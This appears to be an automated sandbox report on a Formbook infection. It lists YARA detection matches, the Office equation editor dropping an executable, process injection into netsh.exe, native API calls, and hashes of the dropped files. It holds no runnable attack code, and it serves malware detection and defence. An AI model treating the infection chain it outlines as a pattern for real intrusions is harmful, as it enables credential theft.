Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\princedan85671.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419D60 NtCreateFile, 6_2_00419D60
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419E10 NtReadFile, 6_2_00419E10
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419E90 NtClose, 6_2_00419E90
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419F40 NtAllocateVirtualMemory, 6_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419D5A NtCreateFile, 6_2_00419D5A
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419DB2 NtCreateFile, 6_2_00419DB2
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419E8A NtClose, 6_2_00419E8A
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F00C4 NtCreateFile,LdrInitializeThunk, 6_2_009F00C4
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F0048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_009F0048
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F0078 NtResumeThread,LdrInitializeThunk, 6_2_009F0078
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EF9F0 NtClose,LdrInitializeThunk, 6_2_009EF9F0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EF900 NtReadFile,LdrInitializeThunk, 6_2_009EF900
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_009EFAD0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_009EFAE8
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_009EFBB8
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_009EFB68
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_009EFC90
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_009EFC60
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFD8C NtDelayExecution,LdrInitializeThunk, 6_2_009EFD8C
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_009EFDC0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_009EFEA0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_009EFED0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFFB4 NtCreateSection,LdrInitializeThunk, 6_2_009EFFB4
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F10D0 NtOpenProcessToken, 6_2_009F10D0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F0060 NtQuerySection, 6_2_009F0060
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F01D4 NtSetValueKey, 6_2_009F01D4
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F010C NtOpenDirectoryObject, 6_2_009F010C
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F1148 NtOpenThread, 6_2_009F1148
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F07AC NtCreateMutant, 6_2_009F07AC
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EF8CC NtWaitForSingleObject, 6_2_009EF8CC
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EF938 NtWriteFile, 6_2_009EF938
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F1930 NtSetContextThread, 6_2_009F1930
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFAB8 NtQueryValueKey, 6_2_009EFAB8
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFA20 NtQueryInformationFile, 6_2_009EFA20
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFA50 NtEnumerateValueKey, 6_2_009EFA50
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFBE8 NtQueryVirtualMemory, 6_2_009EFBE8
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFB50 NtCreateKey, 6_2_009EFB50
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFC30 NtOpenProcess, 6_2_009EFC30
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFC48 NtSetInformationFile, 6_2_009EFC48
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F0C40 NtGetContextThread, 6_2_009F0C40
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F1D80 NtSuspendThread, 6_2_009F1D80
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFD5C NtEnumerateKey, 6_2_009EFD5C
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFE24 NtWriteVirtualMemory, 6_2_009EFE24
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFFFC NtCreateProcessEx, 6_2_009EFFFC
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFF34 NtQueueApcThread, 6_2_009EFF34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C900C4 NtCreateFile,LdrInitializeThunk, 8_2_00C900C4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C907AC NtCreateMutant,LdrInitializeThunk, 8_2_00C907AC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8F9F0 NtClose,LdrInitializeThunk, 8_2_00C8F9F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8F900 NtReadFile,LdrInitializeThunk, 8_2_00C8F900
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_00C8FAE8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_00C8FBB8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FB50 NtCreateKey,LdrInitializeThunk, 8_2_00C8FB50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_00C8FB68
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_00C8FC60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_00C8FDC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FD8C NtDelayExecution,LdrInitializeThunk, 8_2_00C8FD8C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_00C8FED0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FFB4 NtCreateSection,LdrInitializeThunk, 8_2_00C8FFB4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C910D0 NtOpenProcessToken, 8_2_00C910D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C90048 NtProtectVirtualMemory, 8_2_00C90048
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C90060 NtQuerySection, 8_2_00C90060
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C90078 NtResumeThread, 8_2_00C90078
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C901D4 NtSetValueKey, 8_2_00C901D4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C91148 NtOpenThread, 8_2_00C91148
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9010C NtOpenDirectoryObject, 8_2_00C9010C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8F8CC NtWaitForSingleObject, 8_2_00C8F8CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8F938 NtWriteFile, 8_2_00C8F938
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C91930 NtSetContextThread, 8_2_00C91930
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FAD0 NtAllocateVirtualMemory, 8_2_00C8FAD0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FAB8 NtQueryValueKey, 8_2_00C8FAB8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FA50 NtEnumerateValueKey, 8_2_00C8FA50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FA20 NtQueryInformationFile, 8_2_00C8FA20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FBE8 NtQueryVirtualMemory, 8_2_00C8FBE8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FC90 NtUnmapViewOfSection, 8_2_00C8FC90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FC48 NtSetInformationFile, 8_2_00C8FC48
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C90C40 NtGetContextThread, 8_2_00C90C40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FC30 NtOpenProcess, 8_2_00C8FC30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C91D80 NtSuspendThread, 8_2_00C91D80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FD5C NtEnumerateKey, 8_2_00C8FD5C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FEA0 NtReadVirtualMemory, 8_2_00C8FEA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FE24 NtWriteVirtualMemory, 8_2_00C8FE24
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FFFC NtCreateProcessEx, 8_2_00C8FFFC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FF34 NtQueueApcThread, 8_2_00C8FF34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00099D60 NtCreateFile, 8_2_00099D60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00099E10 NtReadFile, 8_2_00099E10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00099E90 NtClose, 8_2_00099E90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00099D5A NtCreateFile, 8_2_00099D5A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00099DB2 NtCreateFile, 8_2_00099DB2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00099E8A NtClose, 8_2_00099E8A
Detected potential crypto function
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CC63DB 8_2_00CC63DB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D463BF 8_2_00D463BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA7353 8_2_00CA7353
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CEA37B 8_2_00CEA37B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA2305 8_2_00CA2305
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CB1489 8_2_00CB1489
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CD5485 8_2_00CD5485
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CDD47D 8_2_00CDD47D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D2443E 8_2_00D2443E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CBC5F0 8_2_00CBC5F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CE6540 8_2_00CE6540
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA351F 8_2_00CA351F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CAE6C1 8_2_00CAE6C1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA4680 8_2_00CA4680
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D42622 8_2_00D42622
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CEA634 8_2_00CEA634
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CD57C3 8_2_00CD57C3
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D2579A 8_2_00D2579A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CAC7BC 8_2_00CAC7BC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D3F8EE 8_2_00D3F8EE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CAC85C 8_2_00CAC85C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CC286D 8_2_00CC286D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CB69FE 8_2_00CB69FE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D4098E 8_2_00D4098E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA29B2 8_2_00CA29B2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D25955 8_2_00D25955
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D2394B 8_2_00D2394B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D53A83 8_2_00D53A83
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D2DBDA 8_2_00D2DBDA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9FBD7 8_2_00C9FBD7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D4CBA4 8_2_00D4CBA4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CC7B00 8_2_00CC7B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D3FDDD 8_2_00D3FDDD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CACD5B 8_2_00CACD5B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CD0D3B 8_2_00CD0D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CBEE4C 8_2_00CBEE4C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CD2E2F 8_2_00CD2E2F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D12FDC 8_2_00D12FDC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D3CFB1 8_2_00D3CFB1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CCDF7C 8_2_00CCDF7C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CB0F3F 8_2_00CB0F3F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009E004 8_2_0009E004
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00082D87 8_2_00082D87
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00082D90 8_2_00082D90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00089E40 8_2_00089E40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00082FB0 8_2_00082FB0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\princedan85671.exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\princedan85671.exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: String function: 00A6F970 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: String function: 00A43F92 appears 132 times
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: String function: 00A4373B appears 245 times
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: String function: 009FE2A8 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: String function: 009FDF5C appears 119 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00D0F970 appears 84 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00C9E2A8 appears 38 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00CE373B appears 245 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00CE3F92 appears 132 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00C9DF5C appears 121 times
PE file contains strange resources
Source: princedanx[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedanx[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan85671.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan85671.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan85671.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan85671.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
